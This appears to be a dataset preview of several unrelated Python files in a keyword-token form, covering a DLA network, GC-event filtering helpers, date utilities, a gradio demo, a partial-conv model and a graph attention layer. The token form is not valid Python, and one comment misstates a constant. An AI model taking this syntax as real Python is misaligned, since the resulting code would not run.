kernel_size=4 channel_last=<false><block_start>rng=np.random.RandomState(313)<line_sep>axes=3<if>channel_last<else>1<with_stmt>nn.parameter_scope("up")<block_start>x=pf_convolution(x ochannels (1 1) stride=(1 1) with_bias=<false> w_init=he_initializer(ochannels kernel_size rng) channel_last=channel_last)<line_sep>x=F.relu(PF.batch_normalization(x axes=[axes] batch_stat=<not>test))<line_sep>ichannels=x.shape[axes]<line_sep>x=pf_depthwise_deconvolution(x (kernel_size kernel_size) pad=(1 1) stride=(2 2) dilation=(1 1) with_bias=<false> w_init=bilinear_depthwise_initializer(ichannels kernel_size) channel_last=channel_last)<block_end><return>x<block_end><def_stmt>_make_tree_level1 x children block ochannels level test level_root=<false> stride=1 channel_last=<false><block_start>axes=3<if>channel_last<else>1<line_sep>ichannels=x.shape[axes]<line_sep>bottom=F.max_pooling(x kernel=(stride stride) stride=(stride stride) channel_last=channel_last)<if>stride<g>1<else>x<if_stmt>ichannels<ne>ochannels<block_start>residual=pf_convolution(bottom ochannels (1 1) stride=(1 1) pad=<none> with_bias=<false> channel_last=channel_last)<line_sep>residual=PF.batch_normalization(residual axes=[axes] batch_stat=<not>test)<block_end><else_stmt><block_start>residual=bottom<block_end><with_stmt>nn.parameter_scope('block1')<block_start>b1=block(x residual ochannels stride test channel_last=channel_last)<block_end><with_stmt>nn.parameter_scope('block2')<block_start>b2=block(b1 b1 ochannels 1 test channel_last=channel_last)<block_end>_children=[bottom b2]<if>level_root<else>[b2]<if_stmt>children<block_start>_children<augadd>children<block_end>x=root(b1 _children ochannels test kernel_size=1 channel_last=channel_last)<line_sep><return>x bottom<block_end><def_stmt>_make_tree_level2 x children block ochannels level test level_root=<false> stride=1 channel_last=<false><block_start><with_stmt>nn.parameter_scope('node1')<block_start>ag1,bottom1=_make_tree_level1(x <none> block ochannels level test <false> stride channel_last=channel_last)<block_end><with_stmt>nn.parameter_scope('node2')<block_start>x,_=_make_tree_level1(ag1 [bottom1] block ochannels level test level_root 1 channel_last=channel_last)<block_end><return>x<block_end><def_stmt>dla_imagenet x num_classes num_layers test residual_root=<false> tiny=<false> channel_last=<false><block_start>"""
Args:
x : Variable
num_classes : Number of classes of outputs
num_layers : Number of layers of DLA chosen from (34).
test : Construct net for testing.
tiny (bool): Tiny imagenet mode. Input image must be (3, 56, 56).
"""<line_sep>layers={# 18: ((2, 2, 2, 2), basicblock, 1),
34:((1 1 1 2 2 1) (<false> <false> <false> <true> <true> <true>) basicblock)# 50: ((3, 4, 6, 3), bottleneck, 4),
# 101: ((3, 4, 23, 3), bottleneck, 4),
# 152: ((3, 8, 36, 3), bottleneck, 4)
}<line_sep>ochannels=[16 32 64 128 256 512]<line_sep>levels,levels_root,block=layers[num_layers]<line_sep>strides=[1 2 2 2 2 2]<line_sep>logger.debug(x.shape)<line_sep>axes=3<if>channel_last<else>1<with_stmt>nn.parameter_scope("conv1")<block_start>stride=(1 1)<line_sep>r=pf_convolution(x 16 (7 7) pad=(3 3) stride=stride with_bias=<false> channel_last=channel_last)<line_sep>r=F.relu(PF.batch_normalization(r axes=[axes] batch_stat=<not>test))<block_end>hidden={}<line_sep>hidden['conv0']=r<line_sep>logger.debug(r.shape)<with_stmt>nn.parameter_scope("level0")<block_start>r=_make_conv_level(r ochannels[0] levels[0] test=test stride=strides[0] channel_last=channel_last)<line_sep>hidden['level0']=r<line_sep>logger.debug(r.shape)<block_end><with_stmt>nn.parameter_scope("level1")<block_start>r=_make_conv_level(r ochannels[1] levels[1] test=test stride=strides[1] channel_last=channel_last)<line_sep>hidden['level1']=r<line_sep>logger.debug(r.shape)<block_end><with_stmt>nn.parameter_scope("level2")<block_start>r,_=_make_tree_level1(r <none> block ochannels[2] levels[2] test levels_root[2] stride=strides[2] channel_last=channel_last)<line_sep>hidden['level2']=r<line_sep>logger.debug(r.shape)<block_end><with_stmt>nn.parameter_scope("level3")<block_start>r=_make_tree_level2(r <none> block ochannels[3] levels[3] test levels_root[3] stride=strides[3] channel_last=channel_last)<line_sep>hidden['level3']=r<line_sep>logger.debug(r.shape)<block_end><with_stmt>nn.parameter_scope("level4")<block_start>r=_make_tree_level2(r <none> block ochannels[4] levels[4] test levels_root[4] stride=strides[4] channel_last=channel_last)<line_sep>hidden['level4']=r<line_sep>logger.debug(r.shape)<block_end><with_stmt>nn.parameter_scope("level5")<block_start>r,_=_make_tree_level1(r <none> block ochannels[5] levels[5] test levels_root[5] stride=strides[5] channel_last=channel_last)<line_sep>hidden['level5']=r<line_sep>logger.debug(r.shape)<block_end>pool_shape=r.shape[-2:]<if_stmt>channel_last<block_start>pool_shape=r.shape[1:3]<block_end>r=F.average_pooling(r pool_shape channel_last=channel_last)<with_stmt>nn.parameter_scope("fc")<block_start>r=pf_affine(r num_classes channel_last=channel_last)<block_end>logger.debug(r.shape)<line_sep><return>r hidden<block_end># Upsampling portion of DLA
<def_stmt>DLAUp x test residual_root=<false> channel_last=<false><block_start>r,hidden=dla_imagenet(x num_classes=1000 num_layers=34 test=test channel_last=channel_last)<line_sep>callback=NnpNetworkPass(<true>)<line_sep>callback.remove_and_rewire('fc')<line_sep>ochannels=[256 128 64 32]<with_stmt>nn.parameter_scope("up16")<block_start>x=upsample(hidden['level5'] ochannels[0] test kernel_size=4 channel_last=channel_last)<line_sep>hidden['up16']=x<block_end><with_stmt>nn.parameter_scope("up8")<block_start>x=root(x [hidden['level4']] ochannels[0] test kernel_size=3 channel_last=channel_last)<line_sep>x=upsample(x ochannels[1] test kernel_size=4 channel_last=channel_last)<line_sep>hidden['up8']=x<block_end><with_stmt>nn.parameter_scope("up4")<block_start><with_stmt>nn.parameter_scope("residual_level3")<block_start>level4up=upsample(hidden['level4'] ochannels[1] test kernel_size=4 channel_last=channel_last)<with_stmt>nn.parameter_scope("level3up_root")<block_start>level3up=root(level4up [hidden['level3']] ochannels[1] test kernel_size=3 channel_last=channel_last)<block_end><with_stmt>nn.parameter_scope("x_root")<block_start>x=root(x [level3up] ochannels[1] test kernel_size=1 channel_last=channel_last)<block_end><block_end>x=upsample(x ochannels[2] test kernel_size=4 channel_last=channel_last)<line_sep>hidden['up4']=x<block_end><with_stmt>nn.parameter_scope("up2_b")<block_start>level3up_b=upsample(level3up ochannels[2] test kernel_size=4 channel_last=channel_last)<block_end><with_stmt>nn.parameter_scope("up2_c")<block_start>level3up_c=upsample(hidden['level3'] ochannels[2] test kernel_size=4 channel_last=channel_last)<with_stmt>nn.parameter_scope("level3up_c_root")<block_start>level3up_c=root(hidden['level2'] [level3up_c] ochannels[2] test kernel_size=3 channel_last=channel_last)<block_end><with_stmt>nn.parameter_scope("level2up_root")<block_start>level2up=root(level3up_b [level3up_c] ochannels[2] test kernel_size=3 channel_last=channel_last)<block_end><with_stmt>nn.parameter_scope("x_root")<block_start>x=root(x [level2up] ochannels[2] test kernel_size=3 channel_last=channel_last)<block_end><block_end><return>x<block_end> |
# filter_and_group.py
#
# Given a set of filters, and groupings, take data from pandas gc event dataframes,
# and return a modified subset of the data that follows the passed filters/groups.
# Note: It is possible to export the following function to hold a state variable of the
# modified subset: apply_filter
#
# The functions defined are used within in the plotting functions, and are not called in the GCGC notebook
#
<import_stmt>matplotlib<line_sep># filter_and_group
#
# Given a list of datasets, use provided parameters to group and split
# the data into useable pandas series.
#
<def_stmt>filter_and_group datasets # list of gc_event_dataframes
group_by=<none> # creates a group for each unique value in a column specified
filter_by=<none> # a function to be applied to the row of the table. Should return a boolean
labels=<none> # a list of strings to describe the datasets passed in
column="Duration_milliseconds" # the column name that we are analyzing from our dataset
colors=<none> # a list colors. If none are provided, determinsitic colors returned for dataset
column_timing=<none># Overrides the timing column to collect, if provided. All values in the column must be ints/floats
# Apply the filters, if any
<block_start><if_stmt>filter_by<block_start>datasets=apply_filter(datasets filter_by)<block_end># Create the labels if non provided
<if_stmt><not>labels<block_start>labels=[str(num+1)<for>num range(len(datasets))]<block_end><if_stmt><not>column_timing<block_start>column_timing="TimeFromStart_seconds"<block_end># Group into lists of X/Y associated data with labels.
timestamp_groups=[]# For time of event
datapoint_groups=[]# For data in 'column'
group_labels=[]# Label to descrbe the group.
<if_stmt>group_by<block_start>timestamp_groups,datapoint_groups,group_labels=arrange_into_groups(datasets group_by column column_timing labels)<block_end><else_stmt><block_start>timestamp_groups,datapoint_groups,group_labels=arrange_no_groups(datasets column column_timing labels)<block_end># Add the colors.
<if_stmt><not>colors<block_start>colors,alphas=get_colors_and_alphas(len(group_labels))<block_end><else_stmt><block_start>alphas=[1<for>i range(len(colors))]<block_end><if_stmt>column_timing<eq>"DateTime"# find the minimum time in any timestamp_group, and subtract it from all recorded values.
<block_start>timestamp_groups=__remove_datetime_scaling(timestamp_groups)<block_end><return>timestamp_groups datapoint_groups group_labels colors alphas<block_end><import_stmt>pandas<as>pd<line_sep># apply_filter
#
# For each dataset, apply each filter. Create a copy of the data to be fitered,
# so the original data is not modified or lost. Return the list of copied & filetered datasets
#
<def_stmt>apply_filter datasets filter_by=<none><block_start>dfs=[]<if_stmt>filter_by# create a copy, to be modified
<block_start><for_stmt>df datasets<block_start>dfs.append(df.copy())<block_end># the reason to use index is to update the actual value
<for_stmt>i range(len(dfs))# Apply functions return a boolean. Only retain rows that evaluate to True
<block_start>dfs[i]=dfs[i][dfs[i].apply(filter_by axis=1)]<block_end><block_end><else_stmt># Return the same data if no filters needed
<block_start>dfs=datasets<block_end><return>dfs<block_end># get_colors_and_alphas
#
# Given then number of colors, returns that many colors from a preset
# sequence of repeating colors, begging at the start of the sequence
#
<def_stmt>get_colors_and_alphas number_of_colors<block_start>preset_colors=[(230/255 25/255 75/255) (60/255 180/255 75/255) (215/255 215/255 25/255) (0/255 130/255 200/255) (245/255 130/255 48/255) (145/255 30/255 180/255) (70/255 240/255 240/255) (240/255 50/255 230/255) (210/255 245/255 60/255) (250/255 190/255 212/255) (0/255 128/255 128/255) (220/255 190/255 255/255) (170/255 110/255 40/255) (255/255 250/255 200/255) (128/255 0/255 0/255) (170/255 255/255 195/255) (128/255 128/255 0/255) (255/255 215/255 180/255) (0/255 0/255 128/255) (128/255 128/255 128/255) (0 0 0)]<line_sep># https://sashamaps.net/docs/resources/20-colors/
colors=[]<line_sep>alphas=[]<while_stmt>number_of_colors<g>len(preset_colors)# In the case where we need MANY colors, copy the cycle and add more.
<block_start>preset_colors=preset_colors+preset_colors<block_end><for_stmt>idx range(number_of_colors)<block_start>colors.append(preset_colors[idx])<line_sep>alphas.append(1)<block_end><return>colors alphas<block_end># arrange_into_groups
#
# Given a grouping pattern, and set of filtered datasets, creates a list of
# X and Y datalists for each group found in the passed dataset.
#
<def_stmt>arrange_into_groups datasets group_by column column_timing labels<block_start>timestamp_groups=[]<line_sep>datapoint_groups=[]<line_sep>group_labels=[]<for_stmt>idx,df enumerate(datasets)# Loop through all provided log datasets
<block_start><if_stmt><not>df.empty<block_start><if_stmt>group_by<not><in>df<block_start>print("Warning: group_by group "+str(group_by)+" column not in dataset with columns "+str(df.columns))<block_end><elif_stmt>column<not><in>df<block_start>print("Warning: column \""+str(column)+"\" not in dataset with columns "+str(df.columns))<block_end><elif_stmt>column_timing<not><in>df<block_start>print("Warning: column_timing \""+str(column_timing)+"\" not in dataset with columns "+str(df.columns))<block_end><else_stmt># A non-empty df contains both X and Y columns.
<block_start>groups={}# Create a dictionary to hold unique groups
<if_stmt>column_timing<eq>"DateTime"<block_start>print("Case number 1")<line_sep>timing=pd.Series(matplotlib.dates.date2num(df[column_timing]))<block_end><else_stmt><block_start>timing=df[column_timing]<block_end><for_stmt>group,time,datapoint zip(df[group_by] timing df[column])<block_start><if_stmt><not>group<block_start>group="( "+str(group_by)+" = None )"# None groups should all be put together
<block_end><if_stmt>group<not><in>groups# Create a new group for each unique item
<block_start>groups[group]=[[] [] str(labels[idx])+": "+str(group)]<block_end># add the datapoints and time, based on the grouping
groups[group][0].append(time)<line_sep>groups[group][1].append(datapoint)<block_end># Sort keys so groups print in the same order between files
keys=list(groups.keys())<line_sep>keys.sort()<for_stmt>key keys<block_start>timestamp_groups.append(pd.Series(groups[key][0]))<line_sep>datapoint_groups.append(pd.Series(groups[key][1]))<line_sep>group_labels.append(groups[key][2])<block_end><block_end><block_end><block_end><return>timestamp_groups datapoint_groups group_labels<block_end># arrange_no_groups
#
# Given no grouping pattern, take data from datasets, place them
# into of X and Y datasets.
#
<def_stmt>arrange_no_groups datasets column column_timing labels<block_start>timestamp_groups=[]<line_sep>datapoint_groups=[]<line_sep>group_labels=[]# Included in case no data is extracted from a df
<for_stmt>idx,df enumerate(datasets)# Make sure both the columns are present, and rows are present
<block_start><if_stmt><not>df.empty<and>column_timing<in>df<and>column<in>df<block_start><if_stmt>column_timing<eq>"DateTime"<block_start>timestamp_groups.append(pd.Series(matplotlib.dates.date2num(df[column_timing])))<block_end><else_stmt><block_start>timestamp_groups.append(df[column_timing])<block_end>datapoint_groups.append(df[column])<line_sep>group_labels.append(labels[idx])<block_end><block_end><return>timestamp_groups datapoint_groups group_labels<block_end># Given that column_timing is set to "DateTime" characters,
# shift them into TimePassed in Seconds scaling.
<def_stmt>__remove_datetime_scaling timestamp_groups# Each list of timestamp groups contains numbers in matplotlib datetime formats.
# First, determine the minimum time present
# Then, subtract from all that minimum time to make the values begin from zero.
# Then, scale the times into seconds (x84600). Scaling explained here: https://matplotlib.org/stable/api/dates_api.html
<block_start>min_time=timestamp_groups[0].min()<line_sep>print(len(timestamp_groups))<for_stmt>index range(1 len(timestamp_groups))<block_start>min_time=min(min_time timestamp_groups[index].min())<block_end>print(min_time)<line_sep>new_times=[]<for_stmt>timestamp_list timestamp_groups<block_start>timestamp_list=[(time-min_time)<times>86400<for>time timestamp_list]# scaling
new_times.append(timestamp_list)<block_end># Note the datatype returned. Series rather than list
<return>pd.Series(new_times)<block_end> |
"""Date and time functions
Refactored from Cufflinks' 'date_tools.py' module.
Credits to @jorgesantos.
"""<import_stmt>datetime<as>dt<def_stmt>get_date_from_today delta strfmt='%Y%m%d'<block_start>""" Returns a string that represents a date n numbers of days from today.
Parameters
----------
delta : int
number of days
strfmt : string
format in which the date will be represented
"""<line_sep><return>(dt.date.today()+dt.timedelta(delta)).strftime(strfmt)<block_end><def_stmt>string_to_date string_date strfmt='%Y%m%d'<block_start>""" Converts a string format date into datetime.
Parameters
----------
string_date : string
date in string format
strfmt : string
format in which the input date is represented
"""<line_sep><return>dt.datetime.strptime(string_date strfmt).date()<block_end><def_stmt>int_to_date int_date<block_start>""" Converts an int format date into datetime.
Parameters
----------
int_date : int
date in int format
Example
-------
int_date(20151023)
"""<line_sep><return>string_to_date(str(int_date))<block_end><def_stmt>date_to_int date strfmt='%Y%m%d'<block_start>""" Converts a datetime date into int.
Parameters
----------
date : datetime
date in datetime format
strfmt : string
format in which the int date will be generated
Example
-------
date_to_int(dt.date(2015,10,23),'%Y')
"""<line_sep><return>int(date.strftime(strfmt))<block_end> |
<import_stmt>gradio<as>gr<import_stmt>numpy<as>np<def_stmt>transpose matrix<block_start><return>matrix.T<block_end>iface=gr.Interface(transpose gr.inputs.Dataframe(type="numpy" datatype="number" row_count=5 col_count=3) "numpy" examples=[[np.zeros((3 3)).tolist()] [np.ones((2 2)).tolist()] [np.random.randint(0 10 (3 10)).tolist()] [np.random.randint(0 10 (10 3)).tolist()] [np.random.randint(0 10 (10 10)).tolist()] ])<line_sep>iface.test_launch()<if_stmt>__name__<eq>"__main__"<block_start>iface.launch()<block_end> |
# Copyright (c) OpenMMLab. All rights reserved.
<import_stmt>torch.nn<as>nn<import_from_stmt>mmcv.runner auto_fp16 load_checkpoint<import_from_stmt>mmedit.models.builder build_component<import_from_stmt>mmedit.models.registry BACKBONES<import_from_stmt>mmedit.utils get_root_logger<line_sep>@BACKBONES.register_module()<class_stmt>PConvEncoderDecoder(nn.Module)<block_start>"""Encoder-Decoder with partial conv module.
Args:
encoder (dict): Config of the encoder.
decoder (dict): Config of the decoder.
"""<def_stmt>__init__ self encoder decoder<block_start>super().__init__()<line_sep>self.encoder=build_component(encoder)<line_sep>self.decoder=build_component(decoder)<line_sep># support fp16
self.fp16_enabled=<false><block_end>@auto_fp16()<def_stmt>forward self x mask_in<block_start>"""Forward Function.
Args:
x (torch.Tensor): Input tensor with shape of (n, c, h, w).
mask_in (torch.Tensor): Input tensor with shape of (n, c, h, w).
Returns:
torch.Tensor: Output tensor with shape of (n, c, h', w').
"""<line_sep>enc_outputs=self.encoder(x mask_in)<line_sep>x,final_mask=self.decoder(enc_outputs)<line_sep><return>x final_mask<block_end><def_stmt>init_weights self pretrained=<none><block_start>"""Init weights for models.
Args:
pretrained (str, optional): Path for pretrained weights. If given
None, pretrained weights will not be loaded. Defaults to None.
"""<if_stmt>isinstance(pretrained str)<block_start>logger=get_root_logger()<line_sep>load_checkpoint(self pretrained strict=<false> logger=logger)<block_end><elif_stmt>pretrained<is><none># Here, we just use the default initialization in `ConvModule`.
<block_start><pass><block_end><else_stmt><block_start><raise>TypeError('pretrained must be a str or None')<block_end><block_end><block_end> |
<import_stmt>torch<import_stmt>torch.nn<as>nn<import_stmt>torch.nn.init<as>init<import_stmt>torch.nn.functional<as>F<import_from_stmt>config DEVICE<class_stmt>GraphAttentionLayer(nn.Module)<block_start>"""
reference: https://github.com/xptree/DeepInf
"""<def_stmt>__init__ self att_head in_dim out_dim dp_gnn leaky_alpha=0.2<block_start>super(GraphAttentionLayer self).__init__()<line_sep>self.in_dim=in_dim<line_sep>self.out_dim=out_dim<line_sep>self.dp_gnn=dp_gnn<line_sep>self.att_head=att_head<line_sep>self.W=nn.Parameter(torch.Tensor(self.att_head self.in_dim self.out_dim))<line_sep>self.b=nn.Parameter(torch.Tensor(self.out_dim))<line_sep>self.w_src=nn.Parameter(torch.Tensor(self.att_head self.out_dim 1))<line_sep>self.w_dst=nn.Parameter(torch.Tensor(self.att_head self.out_dim 1))<line_sep>self.leaky_alpha=leaky_alpha<line_sep>self.init_gnn_param()<assert_stmt>self.in_dim<eq>self.out_dim<times>self.att_head<line_sep>self.H=nn.Linear(self.in_dim self.in_dim)<line_sep>init.xavier_normal_(self.H.weight)<block_end><def_stmt>init_gnn_param self<block_start>init.xavier_uniform_(self.W.data)<line_sep>init.zeros_(self.b.data)<line_sep>init.xavier_uniform_(self.w_src.data)<line_sep>init.xavier_uniform_(self.w_dst.data)<block_end><def_stmt>forward self feat_in adj=<none><block_start>batch,N,in_dim=feat_in.size()<assert_stmt>in_dim<eq>self.in_dim<line_sep>feat_in_=feat_in.unsqueeze(1)<line_sep>h=torch.matmul(feat_in_ self.W)<line_sep>attn_src=torch.matmul(F.tanh(h) self.w_src)<line_sep>attn_dst=torch.matmul(F.tanh(h) self.w_dst)<line_sep>attn=attn_src.expand(-1 -1 -1 N)+attn_dst.expand(-1 -1 -1 N).permute(0 1 3 2)<line_sep>attn=F.leaky_relu(attn self.leaky_alpha inplace=<true>)<line_sep>adj=torch.FloatTensor(adj).to(DEVICE)<line_sep>mask=1-adj.unsqueeze(1)<line_sep>attn.data.masked_fill_(mask.byte() -999)<line_sep>attn=F.softmax(attn dim=-1)<line_sep>feat_out=torch.matmul(attn h)+self.b<line_sep>feat_out=feat_out.transpose(1 2).contiguous().view(batch N -1)<line_sep>feat_out=F.elu(feat_out)<line_sep>gate=F.sigmoid(self.H(feat_in))<line_sep>feat_out=gate<times>feat_out+(1-gate)<times>feat_in<line_sep>feat_out=F.dropout(feat_out self.dp_gnn training=self.training)<line_sep><return>feat_out<block_end><def_stmt>__repr__ self<block_start><return>self.__class__.__name__+' ('+str(self.in_dim)+' -> '+str(self.out_dim<times>self.att_head)+')'<block_end><block_end> |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.